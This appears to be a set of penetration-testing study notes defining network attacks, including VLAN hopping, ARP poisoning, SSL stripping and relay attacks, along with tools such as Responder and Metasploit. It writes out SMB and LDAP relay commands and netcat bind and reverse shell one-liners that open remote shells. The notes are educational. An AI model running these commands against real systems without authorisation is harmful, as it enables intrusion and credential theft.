Network Attacks
Exploiting the network infrastructure to gain unauthorized access, extract data, or disrupt normal operations
Stress Testing
A software testing method that evaluates how software performs under extreme load
Packet Storm (Broadcast / Network Storm)
Any large increase in network traffic directed at a given target
Character Generator Protocol
Used in testing, debugging, and measuring the network
CHARGEN operates over either TCP or UDP on port 19. It sends arbitrary characters to the host until that host terminates the session
Segmentation Bypassing
Refers to techniques used to circumvent network segmentation controls
Network Segmentation
A security practice that divides a network into smaller segments to limit the spread of potential attacks and to contain threats
Virtual Local Area Network (VLAN) Hopping
A technique used by attackers to gain access to network segments they should not have access to by exploiting vulnerabilities in the VLAN configuration
VLAN
Used to segment network traffic at the data link layer (layer 2), creating isolated network segments on the same physical network
Switch Spoofing
An attacker configures a device to mimic a trunking switch, i.e. a network switch that can carry multiple VLANs over a single physical connection (port or link) between switches
Double Tagging
An attacker sends packets with two VLAN tags
Multihomed Host
A device that has multiple network interfaces, each connected to different networks
Media Access Control (MAC) Address
Means of identifying a device physically and allowing it to operate on a logical topology. Basically a physical hardware address
First 3 octets (hex pairs) are the vendor code
Last 3 octets (hex pairs) identify the exact machine the address belongs to
Layer 2 devices use MAC addresses to associate which device is connected to which physical port on a given switch
MAC spoofing is really easy. Most operating systems allow you to overwrite the physical burned-in MAC address
Allowlist
Allowed to connect
Blocklist
Not allowed to connect
Network Access Control (NAC)
Technology used to keep unauthorized users or devices from accessing a private network
Persistent Agents
Pieces of software that are installed on the device requesting access to the network
Non-persistent Agents
Require the user to connect to the network
Agentless NAC Solutions
Install the scanning engine on the domain controller instead of on the endpoint device
Also called volatile solutions because they completely run in the volatile RAM of the device
On-Path Attack
An attack where the penetration tester places their workstation logically between two hosts during their communication
Literally just MitM (man-in-the-middle) renamed
Replay Attack
Occurs when valid data is captured by the attacker and then repeated, either immediately or after a delay
Happens when an attacker inserts themselves between the two hosts
Downgrade Attack
Occurs when an attacker attempts to have a client or server abandon a higher security mode in favor of a lower security mode
SSL Stripping
Occurs when an attacker tricks the encryption application into presenting the user with an HTTP connection instead of an HTTPS connection
Certificate Services
Used to manage digital certificates which are essential for establishing secure communications through encryption and authentication
Attacks on certificate services target weaknesses in digital certificate management
Exploiting Misconfigured Services
Kind of self-explanatory
An example is directory listing enabled on a web server
Share Enumeration
Discovering and listing shared resources on a network
Can be done with smbclient
Packet Crafting
Involves creating custom network packets to test devices, simulate attacks, or explore vulnerabilities
SMB Relay Attack
Exploits SMB to intercept and relay authentication, gaining unauthorized access to systems
Configure the environment: smbrelayx.py -h [Attacker IP] -t [Target IP] -u [User]
Wait for a connection
Attempt to gain access
LDAP Relay Attack
Similar to an SMB relay attack but targets LDAP authentication
ntlmrelayx.py -t ldap://[Target IP] -smb2support
Scapy
Offers flexibility for crafting custom packets at a lower level
Netcat (nc)
Command-line utility for reading and writing raw data over a network connection
Bind Shell
A shell where a listening port is opened on the victim’s machine
Attacker —(connects to)→ Victim
Less effective because firewalls usually block inbound traffic (and routing can also get in the way). The upside is that the listener is always waiting for a connection
Reverse Shell
Attacker installs a listener on their own workstation and configures a listening port
Victim —(connects to)→ Attacker
Can go through firewalls (outbound traffic is usually allowed)
Netcat Bindshell
nc -lp <port> -e <cmd> on victim
Connect with nc <IP> <port> from attacker
Netcat Reverse Shell
nc -nvlp <port> on attacker (the -n and -v flags are optional; -lp is enough)
Connect with nc <IP> <port> -e <cmd> from the victim
Default Credentials
Are preconfigured usernames and passwords that come with many hardware devices and software applications
Link-Local Multicast Name Resolution (LLMNR)
Based on the DNS packet format; allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link
NetBIOS Name Service (NBNS or NBT-NS)
Part of the NetBIOS-over-TCP protocol suite, used as a form of name resolution inside the internal network to translate internal names to IP addresses
Responder
A command-line tool in Kali Linux that is used to poison NetBIOS, LLMNR, and mDNS name resolution requests
Address Resolution Protocol (ARP)
Runs automatically on a given local area network to identify which workstation is currently assigned a particular IP address at any given time
The purpose of ARP is to create a binding between an IP address and a MAC address inside the LAN at Layer 2 (the data link layer)
ARP Spoofing
Sending falsified ARP messages over a local area network to get the ARP caches to dynamically update with new information
Analogy: you send a letter with someone else's address written as the return address, and the recipient updates their records to list that address as yours
ARP Poisoning
Attack that exploits the IP address to MAC resolution in a network to steal, modify, or redirect frames within that local area network
Metasploit
An open-source penetration testing framework that provides a comprehensive set of tools for exploiting vulnerabilities in systems, networks, and applications
Quickly identifies and exploits vulnerabilities, automates much of the exploitation process, and makes it easy to customize and extend its capabilities
MSFvenom
A standalone payload generator and encoder tool that is part of the Metasploit framework
Combines the functionality of MSFpayload and MSFencode to generate and encode payloads in a single step
Impacket
Used to craft custom network packets, enabling attacks such as SMB or LDAP relay